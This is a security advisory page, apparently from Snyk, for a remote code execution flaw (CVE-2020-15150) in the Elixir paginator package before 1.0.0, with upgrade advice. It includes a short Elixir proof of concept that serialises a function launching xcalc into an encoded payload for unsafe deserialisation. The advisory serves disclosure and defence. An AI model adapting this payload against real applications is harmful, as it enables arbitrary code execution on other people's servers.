Remote Code Execution (RCE) Affecting paginator package, versions <1.0.0


Severity

Recommended
0.0
critical
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
5.97% (94th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Remote Code Execution (RCE) vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-HEX-PAGINATOR-1086684
  • published30 Mar 2021
  • disclosed18 Aug 2020
  • creditPeter Stöckli

Introduced: 18 Aug 2020

CVE-2020-15150  (opens in a new tab)
CWE-94  (opens in a new tab)

How to fix?

Upgrade paginator to version 1.0.0 or higher.

Overview

paginator is a package that enables cursor-based pagination for Elixir Ecto.

Affected versions of this package are vulnerable to Remote Code Execution (RCE) via paginate() function when untrusted input is passed from a remote user.

PoC

defp rce_start_xcalc() do
    exploit = fn _, _ ->  System.cmd("xcalc", []); {:cont, []} end
    payload =
    exploit
    |> :erlang.term_to_binary()
    |> Base.url_encode64()
end

CVSS Scores

version 3.1